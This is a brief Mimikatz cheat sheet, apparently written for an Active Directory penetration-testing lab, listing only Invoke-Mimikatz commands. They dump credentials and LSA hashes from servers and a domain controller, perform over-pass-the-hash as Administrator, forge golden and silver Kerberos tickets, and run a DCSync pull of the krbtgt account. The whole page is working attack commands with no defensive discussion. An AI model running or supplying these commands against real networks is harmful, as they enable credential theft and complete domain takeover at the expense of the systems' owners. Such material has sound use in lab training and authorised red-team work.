Mimikatz Cheatsheet

Dump Creds

1
2
3
Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz -DumpCreds -ComputerName @("server1","server2")

Over Pass The Hash

1
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlm_hash> /run:powershell.exe"

Dump Hashes

1
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc

Creating Tickets

Create A Golden Ticket

1
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_SID> /krbtgt:<NTLM_hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Create A Silver Ticket

1
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'

DCSync Attack

DA privileges required!

1
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'